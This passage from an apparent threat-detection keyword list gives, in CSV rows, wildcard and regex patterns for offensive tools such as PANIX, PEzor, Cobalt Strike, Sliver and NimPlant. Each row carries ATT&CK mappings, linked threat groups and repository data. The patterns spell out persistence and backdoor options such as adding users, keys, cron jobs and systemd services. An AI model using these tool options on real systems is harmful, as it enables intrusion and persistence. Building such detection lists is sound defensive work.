APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4883"
"*.sh *--checksec*",".{0,1000}\.sh\s.{0,1000}\-\-checksec.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","4886"
"*.sh *cvelist-file:*",".{0,1000}\.sh\s.{0,1000}cvelist\-file\:.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","4887"
"*.sh --at --custom --command * --time *",".{0,1000}\.sh\s\-\-at\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-time\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4888"
"*.sh --authorized-keys --custom --key *.ssh/authorized_keys*",".{0,1000}\.sh\s\-\-authorized\-keys\s\-\-custom\s\-\-key\s.{0,1000}\.ssh\/authorized_keys.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4889"
"*.sh --backdoor-user --username *",".{0,1000}\.sh\s\-\-backdoor\-user\s\-\-username\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4890"
"*.sh --cron --custom --command * --crond --name *",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crond\s\-\-name\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4891"
"*.sh --cron --custom --command * --crontab*",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crontab.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4892"
"*.sh --cron --custom --command * --daily --name *",".{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-daily\s\-\-name\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4893"
"*.sh -format=bof *.exe*",".{0,1000}\.sh\s\-format\=bof\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4894"
"*.sh -format=service-dll *",".{0,1000}\.sh\s\-format\=service\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4895"
"*.sh -format=service-exe *",".{0,1000}\.sh\s\-format\=service\-exe\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4896"
"*.sh --passwd-user --custom --passwd-string *",".{0,1000}\.sh\s\-\-passwd\-user\s\-\-custom\s\-\-passwd\-string\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4897"
"*.sh --shell-profile --custom --command * --path */.bash_profile*",".{0,1000}\.sh\s\-\-shell\-profile\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/\.bash_profile.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4898"
"*.sh --systemd --custom --command *",".{0,1000}\.sh\s\-\-systemd\s\-\-custom\s\-\-command\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4899"
"*.sh --systemd --default --ip * --port *",".{0,1000}\.sh\s\-\-systemd\s\-\-default\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4900"
"*.sh --udev --custom --command *",".{0,1000}\.sh\s\-\-udev\s\-\-custom\s\-\-command\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4901"
"*.sh --xdg --custom --command * --path */etc/xdg/autostart/*",".{0,1000}\.sh\s\-\-xdg\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/etc\/xdg\/autostart\/.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4902"
"*.sh -xorkey=*",".{0,1000}\.sh\s\-xorkey\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4903"
"*.sharpgen *",".{0,1000}\.sharpgen\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","0","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","4905"
"*.ShellcodeRDI*",".{0,1000}\.ShellcodeRDI.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","4906"
"*.sites.123456.*",".{0,1000}\.sites\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4907"
"*.SliverRPC/*",".{0,1000}\.SliverRPC\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","4908"
"*.smtp.123456.*",".{0,1000}\.smtp\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4909"
"*.ssl.123456.*",".{0,1000}\.ssl\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4911"
"*.stage.123456.*",".{0,1000}\.stage\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","4912"
"*.stage.123456.*",".{0,1000}\.stage\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#dnsquery","dns query field","10","10","N/A","N/A","N/A","N/A","4913"
"*.static.123456.*",".{0,1000}\.static\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4914"
"*.status.123456.*",".{0,1000}\.status\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4916"
"*.store.123456.*",".{0,1000}\.store\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4917"
"*.striker.local*",".{0,1000}\.striker\.local.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","4918"
